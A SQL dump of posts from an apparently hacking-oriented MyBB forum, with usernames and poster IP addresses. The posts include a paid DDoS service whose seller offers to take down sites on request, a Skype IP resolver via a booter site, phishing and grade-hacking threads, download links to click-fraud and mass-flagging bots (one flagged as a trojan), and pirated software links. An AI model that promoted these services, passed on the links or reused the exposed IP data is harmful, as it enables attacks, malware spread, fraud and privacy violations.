'0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6183', '765', '3901', '46', 'RE: Vulcan Private Pisher Generator', '0', '100', '??zg???g????61', '1350991460', 'Cool thanks :) I\'ll try this today.', '70.192.1.88', '1186988376', '1', '0', '0', '0', '1', '6e67bc490a2705cd54723b93fcd8a735', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6184', '1068', '0', '54', 'giganews (usenet)[vpn] acount for lifetime', '15', '255', 'sbhshroy2', '1350992146', 'click here http://adfoc.us/7433111268358', '49.15.116.218', '823096538', '0', '0', '0', '0', '1', '09435f761aace243a2efccebb1d34554', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6185', '1069', '0', '54', '[23 October] Premium Elite XXX Passes, All Checked And Working', '15', '255', 'sbhshroy2', '1350992268', 'click here http://adfoc.us/7433111259603', '49.15.116.218', '823096538', '0', '0', '0', '0', '1', '677d4662f98ddfa32dc479b53b148c5b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6186', '874', '4963', '7', 'RE: N.A.S.A HACKED', '0', '259', 'MeowMeow', '1350992367', '[quote=\'??????????¢™\' pid=\'4963\' dateline=\'1350433537\'] [quote=\'MeowMeow\' pid=\'4954\' dateline=\'1350432908\'] You guys are thinking that NASA is some OMG site. Not really it\'s really not that good in any security at all. No new thing. [/quote] LMAO no we arent, Its because it is a government site we arent thinking its a OMG site. [/quote] Lol, isn\'t that what I said exactly?', '121.222.91.48', '2044615472', '0', '0', '0', '0', '1', 'dbcab4528d23b79b684c555758b49c91', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6187', '1069', '6185', '54', 'RE: [23 October] Premium Elite XXX Passes, All Checked And Working', '0', '62', 'R?????zo?', '1350992957', 'thanks for sharing bro, apreciated :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '14c31dc3c30142f7dfa7bd24492d5372', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6188', '1068', '6184', '54', 'RE: giganews (usenet)[vpn] acount for lifetime', '0', '62', 'R?????zo?', '1350993126', 'thanks for sharing bro, apreciated :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '5da8e1f220ac209c4f275a9ae3af6822', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6189', '310', '1458', '13', 'RE: [ HOT ] How to Hack Your School Grading System [Change]', '0', '205', 'mothered', '1350993858', 'Nice tutorial mate. I\'ve bookmarked It, and will read It In detail when time permits. Thanks.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'ec2536bb4047bfa17b2944b14459c7b2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1865', '398', '1860', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$4/Hour]', '0', '100', '??zg???g????61', '1347533759', 'Yeah thats why I posted here. joker, PM me with the website. I\'ll get back to you tonight and take it down for you so you can see. Thanks!', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'ae805c3ac63d9ac53fa48dce3b09e4a4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1866', '378', '1742', '7', 'RE: How is school for you?', '0', '53', 'sirchamp', '1347536097', 'Not sure if you are beeing an idiot on purpose', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '40221d576e4ca95e5158ac346c41c3e2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1867', '315', '1864', '61', 'RE: Welcome to Unique\'s HQ', '0', '82', 'iTzIpod', '1347536967', '[quote=\'R?????zo?\' pid=\'1864\' dateline=\'1347524860\'] Thanks for accepting me :) I will gladly contribute with my unique skills, specially GFX :) [/quote] I love your GFX! ;) You have talent.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '037659d777ca954ae5443dfc65f31c01', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1868', '378', '1866', '7', 'RE: How is school for you?', '0', '82', 'iTzIpod', '1347537154', '[quote=\'sirchamp\' pid=\'1866\' dateline=\'1347536097\'] Not sure if you are beeing an idiot on purpose [/quote] Well you spelt \"beeing\" instead of being so... :whistle:', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '41f77e6aa7e13ed4064db7041d100cec', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1869', '399', '0', '3', '[Bug] Error', '0', '82', 'iTzIpod', '1347537342', '[img]http://prntscr.com/fgpaf[/img] It\'s when I click on the [mod]Removed for security reasons[/mod] section. Not sure if it\'s just me. But I get this error. EDIT: I guess there is something messed up with the image... Right Click>Open Image in New Tab', '24.212.197.164', '416597412', '1', '0', '1', '1347593544', '1', '11e35bfed550a1aa28ed27bad48799f0', '0', '1347593544'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1870', '370', '1761', '35', 'RE: Basic L33THACKING logo (just an basic one)', '0', '172', 'MistaCode', '1347538307', '[quote=\'t3h jok3r\' pid=\'1761\' dateline=\'1347248932\'] Just saw this thread. Logo is kinda basic, thanks for your input though. I check it and doesn\'t look good on the site but if you can make a better one then I can give that one a try too. [/quote] kk ill make an better one :D but the font was something called Hacker argot or something.. but yeah ill make soon an new one ;)', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', '37168e8553da63813c8072c7c801a0ff', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1871', '378', '1742', '7', 'RE: How is school for you?', '0', '53', 'sirchamp', '1347543176', 'Care? I\'m not a native speaker so shut up. You are one unless you live in quebec but I doubt that. And I bet I can speak better french than you even though the official languages of Canada are english and french!', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'e21f7bac87889c7bd9e24aa216fd6fe2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1872', '18', '49', '2', 'RE: star test', '0', '61', 'NXK', '1347545481', 'That star is hot man. Maybe staff upgrade to black stars :)?', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', '762fd0d2f8ea83e80bf17388fb1037fd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1873', '378', '1871', '7', 'RE: How is school for you?', '0', '61', 'NXK', '1347545726', '[quote=\'sirchamp\' pid=\'1871\' dateline=\'1347543176\'] Care? I\'m not a native speaker so shut up. You are one unless you live in quebec but I doubt that. And I bet I can speak better french than you even though the official languages of Canada are english and french! [/quote] Please learn to respect other members.', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', 'e9d98edb2bcad2ce4503419be3850e8a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1874', '370', '1761', '35', 'RE: Basic L33THACKING logo (just an basic one)', '0', '62', 'R?????zo?', '1347548689', '[quote=\'t3h jok3r\' pid=\'1761\' dateline=\'1347248932\'] Just saw this thread. Logo is kinda basic, thanks for your input though. I check it and doesn\'t look good on the site but if you can make a better one then I can give that one a try too. [/quote] if you looking for a logo I can try and make something fancy?', '31.22.165.195', '521577923', '1', '0', '0', '0', '1', '43c8319d0af8708ddfe31ed79c59ea71', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1875', '398', '1860', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$4/Hour]', '0', '67', 'HoverCatz', '1347550123', 'I would like a vouch copy.', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', 'bd84005b3428e436bec5604e4ce919d5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1876', '345', '1632', '63', 'RE: Need userbar! [Gamers]', '0', '62', 'R?????zo?', '1347550339', 'I tried, not sure if you like it though. [img]http://i.imgur.com/iD3g6.png[/img] [img]http://i.imgur.com/QXFt5.png[/img]', '31.22.165.195', '521577923', '1', '0', '62', '1347550525', '1', 'f89844189ae2a8c0aa3e8bc037f896b5', '0', '1347550525'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1877', '398', '1860', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$4/Hour]', '0', '100', '??zg???g????61', '1347556535', 'Alright, thats it for vouch copies though (; PM me with the website info and I\'ll tell you when I take it down.', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', '350427994f727e902014451f43269247', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1878', '399', '1869', '3', 'RE: [Bug] Error', '0', '20', 'JakeUS', '1347564109', 'PM Joker with the issue, unless he sees this thread.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '44d3df6a9d2a728110dbfa3dc29cde68', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1879', '378', '1873', '7', 'RE: How is school for you?', '0', '82', 'iTzIpod', '1347564263', '[quote=\'NXK\' pid=\'1873\' dateline=\'1347545726\'] [quote=\'sirchamp\' pid=\'1871\' dateline=\'1347543176\'] Care? I\'m not a native speaker so shut up. You are one unless you live in quebec but I doubt that. And I bet I can speak better french than you even though the official languages of Canada are english and french! [/quote] Please learn to respect other members. [/quote] Especially Mods and Staff... Thanks for saying that. @sirchamp, I don\'t live in Quebec. Do you win a cookie or something if you speak French/English better than me? I don\'t think that matters at the moment right now.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cb922685b9d24c27944e600430efddf0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1880', '400', '0', '59', 'Free Pizza method', '0', '61', 'NXK', '1347568353', 'I Just got a ebook on how to get free pizza. The user was charging 3$ per copy and this ebook is complete garbage. It\'s not even a full paragraph. here it is. http://www.mediafire.com/?8wzfg850302yrd8 Not even worth 50 cents.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '0554886cf47e752ab7191647e9e88da2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1881', '401', '0', '12', 'How to get a free skype resolver with working numbers !', '0', '82', 'iTzIpod', '1347570604', '[code] 1# Go to this site: http://froststresser.com/booter/login.php 2# Make an account 3# Click Skype Resolver 4# You are done! [/code]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3d18ba710f7c9ba5a4974c3ea95c6f6d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1935', '385', '1852', '19', 'RE: Discussion', '0', '82', 'iTzIpod', '1347633946', '[quote=\'t3h jok3r\' pid=\'1852\' dateline=\'1347491120\'] [b]You\'re a good member[/b], [u]there are always haters in life and if you are afraid of them then you can\'t succeed. At the moment, I\'m the target so don\'t worry.[/u] [/quote] @Bolded Text, Thanks. @Underlined Text, I don\'t get what you mean.?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7dd7503d1b29917f70313ccb2243cef0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1936', '422', '0', '19', '[Junk][Read] Announcement', '0', '82', 'iTzIpod', '1347634256', 'Hey everyone, I might be starting giveaways and stuff now. Only to be released in this group. If you release anything outside of Unique, I will remove you. Please don\'t make me do that because you guys are all HQ. =] I will be starting to do giveaways and all soon. Please don\'t share anything outside the group. :/', '24.212.197.164', '416597412', '1', '0', '82', '1347711552', '1', '96b0f81fb6472946e1d3857dd9cf9594', '0', '1347711552'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1883', '403', '0', '18', 'Youtube Bot', '0', '82', 'iTzIpod', '1347571098', '[align=center]- I take no credit for creating the bot at all [spoiler= Features] * Mass Commenter * Account Checker * Password Changer * Video Collector * Comment Collector * Mass Like/Dislike * Mass Subscribe * Mass Flag [/spoiler] [spoiler=Download] http://www.mediafire.com/?8t8dtobk4u7jq7d [/spoiler] [spoiler=VirusScan] Antivirus Result Update AhnLab-V3 - 20120903 AntiVir - 20120904 Antiy-AVL - 20120904 Avast - 20120904 AVG - 20120904 BitDefender - 20120904 ByteHero - 20120830 CAT-QuickHeal - 20120904 ClamAV - 20120904 Commtouch - 20120904 Comodo - 20120904 DrWeb - 20120904 Emsisoft - 20120904 eSafe - 20120902 ESET-NOD32 - 20120904 F-Prot - 20120903 F-Secure - 20120904 Fortinet - 20120830 GData - 20120904 Ikarus - 20120904 Jiangmin - 20120904 K7AntiVirus - 20120903 Kaspersky - 20120904 McAfee - 20120904 McAfee-GW-Edition - 20120904 Microsoft - 20120904 Norman - None nProtect - 20120904 Panda - 20120903 PCTools - 20120904 Rising - 20120904 Sophos - 20120904 SUPERAntiSpyware - 20120903 Symantec - 20120904 TheHacker - 20120903 TotalDefense - 20120903 TrendMicro - 20120904 TrendMicro-HouseCall - 20120904 VBA32 - 20120904 VIPRE - 20120904 ViRobot - 20120904 VirusBuster - 20120904 [/spoiler][/align]', '24.212.197.164', '416597412', '1', '0', '82', '1347571172', '1', '84b8f404819f37959f4fdac049b1c4c3', '0', '1347571172'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1884', '404', '0', '30', 'Sony Vegas Pro 11.0 & After Effects', '0', '82', 'iTzIpod', '1347571259', 'You don\'t need a torrent for this. Only Winrar. Winrar- http://www.win-rar.com/download.html?&L=0 Adobe AE CS5.5- http://www.gamefront.com/files/21225215/ADinosaurBona+Adobe+After+Effects+CS5.5.rar Sony Vegas Pro 11- http://www.gamefront.com/files/21473431/Sony+vegas+pro+11+By+ADinosaurBona.zip', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'beeaecde37cecaf8a82198fd180832d5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1885', '405', '0', '29', 'Adf.ly Mass Clicking Bot', '0', '82', 'iTzIpod', '1347571418', '[u][b]--Instructions--[/b][/u] [b]1.[/b] Run iView Fur U v3.exe [b]2.[/b] Load a list of mostly USA proxies in the form IP:Port or import from a .txt [b]3.[/b] Input your adf.ly link. (Remember to add the http://www part!) [b]3.[/b] Set the delay to 9 to 16 seconds to avoid ban. [b]4.[/b] Start the program. You should run this in a sandbox until it is confirmed safe. [u][b]Download:[/b][/u] http://www.mediafire.com/?z25zz2iitnm Don\'t have an adf.ly account? [url=http://adf.ly/][b]Sign up for Adf.ly[/b][/url] [img]http://i939.photobucket.com/albums/ad239/111fatty111/iview.png[/img] [i]File Info[/i] Report date: 2012-09-09 22:01:43 (GMT 1) File name: [b]iview-fur-u-v3-exe[/b] File size: 491363 bytes MD5 Hash: b95bf6e70584d7b79d7089cd24f3128d SHA1 Hash: 28db17b77225d346906c7f0820ef9168b5a487d1 Detection rate: [color=red]3[/color] on 14 ([color=red]21%[/color]) Status: [color=red]INFECTED[/color] [i]Detections[/i] Avira - [color=red]TR/Agent.wyy.4[/color] STOPZilla - [color=red]Trojan.Win32.Mal.Gen.35874[/color] TrendMicro - [color=red]TROJ_SPNR.03FK12[/color]', '24.212.197.164', '416597412', '1', '0', '82', '1347571461', '1', 'b9827d5d4de8ece721be19ab24dee349', '0', '1347571461'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1886', '406', '0', '30', 'Skype Fake Quote Generator', '0', '82', 'iTzIpod', '1347571538', '[img]http://i798.photobucket.com/albums/yy262/XykHF/skype-fake.png[/img] http://www.mediafire.com/?y4kqde6ddbhcqch Virus Scan: https://www.virustotal.com/file/b727771bcb35da01f739a26a3b60f2a31bcc29954b9848ffff3ec4deb222133a/analysis/1347381477/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f4c201f99abbfdaf11f68a81142685af', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1887', '407', '0', '29', 'Instagram Bot [Mass Like]', '0', '82', 'iTzIpod', '1347571650', 'Here is the Virus Scan: https://www.virustotal.com/file/ba191eae9fa0248d89c5fef3857a42f4a2864af7b1d502232d2ca490a57b98c1/analysis/ Picture Proof: [IMG]http://i.imgur.com/2jVns.png[/IMG][/u] You can get the bot here: http://www.instaflow.in/ Features * SuperLike * Automatic liking by hashtag * Live-Picture preview * Minimize to tray * Automatic update in-App * Like-counter', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9d033af0a5eff3045f14a531ad22f1af', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1888', '408', '0', '30', 'Hotmail Account Creator', '0', '82', 'iTzIpod', '1347571776', 'Features: -Fully Automated with deathbycaptcha support (plus two others) -Randomly generates email name/password and saves in text file -Set any number of accounts to create - Multi-threaded It also seems to fill in personal information on the accounts, after watching it for 5 minutes or so, which I\'m sure is a plus. Anyway, it\'s free so give it a whirl! Download: http://www.mirrorcreator.com/files/0KWDJ8BS/hotmailcreator.exe_links [img]http://oi42.tinypic.com/28313.jpg[/img] Enjoy! Run in sandboxie if you need to, can\'t guarentee it\'s safe. https://www.virustotal.com/file/2bf8bb1920210f8663a1aaf344fcd66f83f5d7cb6165f57e22f61584c730aeea/analysis/1333736331/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bbfea2d45222a114e64af9d6283e237f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1889', '409', '0', '30', '[Full] Forum Poster 3.30', '0', '82', 'iTzIpod', '1347571952', 'Forum Poster automatically register a user with the username, e-mail and password you typed on the board. It login as the registered user on the board and then post/reply it. All made automatically. With just one click! Forum Poster support add, edit, delete forums URL, Import and export forum URL list. Forum boards are an effective way to drive traffic to your site. With your posted Ads you can bring hundreds of new visitors to your site and increase your search engine rankings which counts on link popularity like Google. The current version can post to 1. phpBB2 V2.0.23 (http://www.phpbb2.com/) 2. phpBB3 V3.0.7-PL1 (http://www.phpbb.com/) 3. Invision Power Board V3.0.5 (http://www.invisionboard.com/) 4. Snitz Forums 2000 V3.4.07 (http://forum.snitz.com/) 5. vBulletin V4.0.2 (http://www.vbulletin.com/) 6. Simple Machines Forum V1.1.11 (http://www.simplemachines.org/) 7. WoltLab Burning Board V3.1.2 (http://www.woltlab.com/) 8. WowBB V1.7 (http://www.wowbb.com/) 9. MyBB V1.4.11 (http://www.mybboard.net/) Auto register,login,post/reply message,logout Support Image Verification Support skip Image Verification forum Find open board to post Selectable forum boards to post (input board number in field \'ForumID\') After login and post ,all \'host unreachable\',\'Connection with remote host lost\',\'Host unrechable\',\'404: Document not found\',\'500: CGI script failed\',\'Anti-bot\',\'Register Error\',\'Account need active\' forums save to one text file and remove from database. You can View process in debug window Support proxy server Support add,delete,edit forum URL Support Import,Export forum list Easy to use, just enter your texts and post it Support post multi topic in one session Your messages can include links,picture.etc(Use BBcode in message,Please see forum help for more information), so your webpage traffic will raise alot [What\'s BBcode?] Increase your position in Search Engines which counts on the link popularity to your site (like Google) Shutdown PC when jobs done Support Unicode and UTF-8 encode. Support Reply Thread Support different username and password for the message board Download: http://www.mediafire.com/?xxlcc5ttns7tbyl', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'aa9cc54de74061f2e6b72bd67310de1b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1890', '410', '0', '30', 'Enhance Views Credits Booster', '0', '82', 'iTzIpod', '1347572179', 'Hello LH, I\'m gonna share my Enhance Views Booster, it boost your primary credits very quickly. Proof: [IMG]http://i.imgur.com/86yk6.jpg[/IMG] I got those credits within one hour. These credits can be used to increase Youtube views to promote your niches and make a profit. :P [url=https://www.virustotal.com/file/ab2dc5129597cc5c04c182bf4f0470bb87af21fef221dd110017a2bad38ee3d0/analysis/1346507135/][color=#FF4500]VIRUS SCAN[/color][/url] [url=http://www.mediafire.com/?561r6rke1mmudew][color=#4682B4]Download Link[/color][/url]', '24.212.197.164', '416597412', '1', '0', '82', '1347572202', '1', '7e3969abe46c27790b646bb61600c6b0', '0', '1347572202'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1891', '411', '0', '30', 'Enhance Views Booster', '0', '82', 'iTzIpod', '1347572348', 'I would like to contribute to the forum with this program.. Yesterday, I had 5259 credits. And after running this program for 12 hours, I now have 8815296 credits. [url=http://www.mediafire.com/?qwf5o853yebauc5] Download Link[/url] [url=https://www.virustotal.com/file/ab2dc5129597cc5c04c182bf4f0470bb87af21fef221dd110017a2bad38ee3d0/analysis/] Virus Scan[/url] It\'s Detected as a Trojan from 1/42 Antiviruses but it works so use it with Sandbox.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '86ba3d10bf99c9a150d83f5a1a8d9e96', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1892', '412', '0', '7', '400th Thread', '0', '82', 'iTzIpod', '1347572744', 'Just saying. Over my past journey through L33t Hacking, we improved our activity by a lot. And also we are making progress on this forum! :D Keep advertising/posting/referring/staying active! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '003639871e2d052e380569d6dbeda523', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1893', '412', '1892', '7', 'RE: 400th Thread', '0', '61', 'NXK', '1347573569', 'We are! It feels good to see. Hopefully We can get a new wave of members soon!', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'f0eee37a3b361f72fe659836f02bb53d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1894', '368', '1841', '47', 'RE: 5 free @l33thacking.net forwarders', '0', '82', 'iTzIpod', '1347573589', '[quote=\'t3h jok3r\' pid=\'1841\' dateline=\'1347466214\'] [quote=\'iTzIpod\' pid=\'1807\' dateline=\'1347392358\'] Wait does it have to be in the time duration of the contest. Or can it be threads from before? [/quote] The threads have to be made after you check in. [/quote] 